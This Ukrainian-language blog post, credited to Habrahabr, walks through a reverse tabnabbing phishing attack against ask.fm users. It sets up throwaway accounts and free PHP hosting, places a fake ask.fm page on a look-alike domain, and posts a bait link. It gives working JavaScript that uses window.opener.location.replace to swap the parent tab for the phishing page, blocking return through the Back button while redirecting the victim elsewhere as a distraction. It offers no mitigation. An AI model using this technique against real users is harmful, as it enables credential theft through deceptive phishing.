Підміна батьківської сторінки на прикладі ask.fm

Доброго часу доби!

Буквально рік тому я виявив цікаву особливість у window.opener. Раніше вже писали інші методи злому через тег, але я покажу на конкретному прикладі мій метод. Метод полягає в підміні адреси батьківської вкладки. Не відкриття адреси, який можна виправити шляхом переходу з історії назад, а саме підміна.
Що ж, вистачить порожньої балаканини, приступимо до справи.
Для виконання завдання мені потрібно:
 
     
  • 1) обліковий запис ask.fm
  •  
  • 2) сервіс реєстрації 10-хвилинної пошти, щоб на нього зареєструвати акаунти хостингу і «аська».
  •  
  • 3) Власне безкоштовний хостинг з можливістю виконання PHP-скриптів
  •  
  • 4) Пару хвилин вільного часу і склянку кави.
  •  
Приступимо…
 
Для початку зарегаться хостинг та обліковий запис на ask.fm. Домен я вибрав askfn.esy.es а ім'я облікового запису ask.fm / forhabrahabr
Перехід за посиланнями в аск.фм йде тільки в поле відповіді, тому задаємо будь-яке питання і відповідаємо на нього посиланням. Найсмішніше, що коли я реєстрував тестовий аккаунт і відповів, то відразу ж отримав два «лайка». Видать людям взагалі без різниці що «лайкать», аби привернути до себе увагу…
Продовжимо…
Для самого тесту, я написав простенький фейк сторінки аск. фм і залив його в директорію askfm. а на головній поставив власне сам скрипт редіректу і підміни батьківського вкладки.
 Його код
<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
   if(parent.window.opener) parent.window.opener.location.replace("http://askfn.esy.es/askfm"); //Здесь адрес, куда направить пользователя (фейк).
   document.location.href = "http://habrahabr.ru/"; //адрес, куда направить юзера для отвода глаз
</script>
</body>
</html>

 
 
 ВАЖЛИВО! В скрипті використовується replace () для того, щоб юзер в разі переляку, натискаючи кнопку назад в браузері, не перейшов назад на ask.fm. Таким чином історія відвідувань нібито очищається.
 ВАЖНО2! Заміна батьківської вкладки працює лише при прямому відкритті посилання… Тобто відкриття в новій вкладці і «натисканням по коліщаті» не змінить батьківську вкладку
 
Отже, виглядає наше посилання ось так
 image
А після переходу за посиланням
 image
 
Власне ось «посилання на заслання»:
 Ask.fm

Джерело: Хабрахабр

0 коментарів

Тільки зареєстровані та авторизовані користувачі можуть залишати коментарі.